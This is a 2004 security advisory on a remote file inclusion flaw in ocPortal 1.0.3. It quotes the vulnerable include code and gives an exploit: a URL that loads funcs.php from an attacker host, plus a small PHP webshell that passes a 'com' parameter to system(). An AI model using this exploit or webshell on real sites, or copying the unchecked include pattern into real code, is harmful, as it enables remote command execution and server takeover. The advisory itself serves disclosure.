[hackgen-2004-#002] - Remote file inclusion bug in ocPortal 1.0.3.
http://www.hackgen.org/advisories/hackgen-2004-002.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2004-#002] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Remote file inclusion bug in ocPortal 1.0.3. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Software: ocPortal <= 1.0.3
Homepage: http://ocportal.com
Author: "Exoduks" - HackGen Team
Release Date: 11 October, 2004
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
ocPortal is the leader in community CMS and portal software for the web.
It allows you to create and configure your own website within minutes.
It's packed full of innovative features that you will not find in competing
software (such as support for multi-site networks, or flexible page view
permissions), taking a completely different approach to the mainstream
competition. ocPortal can seamlessly integrate with most major forum systems,
has an innovative point system for your members to enjoy, support for all your
content (downloads, banners, galleries, and more), the ability to add new
pages
as easily as writing a text file, and produces robust and standard compliant
pages. No other CMS package can do all of that.
// from ocportal.com
0x02 - Vulnerability Discription:
---------------------------------
This vulnerability exists in index.php because there isn't a check for
path in $req_path variable. So we can change the path to some evil host were
the funcs.php script is and we can even run some system command with the evil
script. I have mentioned that you can run system commands with evil script so
this is very critical bug. I sugest you that you immediatly get new version
of this portal.
0x03 - Vulnerability Code:
--------------------------
Vulnerability code is at the beagining of index.php
----- beging the code in index.php -----
if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");
----- end of the code -----
0x04 - How to fix this bug:
---------------------------
Vendor has already publish new scipt with this fix and you can get new
versions
of this portal from http://ocportal.com/
0x05 - Exploit:
----------------
http://localhost/ocp-103/index.php?req_path=http://evil-host/
On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.
<?php
$com = $_GET["com"];
system ("$com");
?>
Example of funcs.php if your host support php.
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
0x006 - The End:
----------------
The end of my second advisor. There will be more advisories but i don't know
when :). Till then you can visit http://forum.hackgen.org.
Grettzz to: All croatian people expecialy Downbload !
______________________________________
Written By Exoduks - www.hackgen.org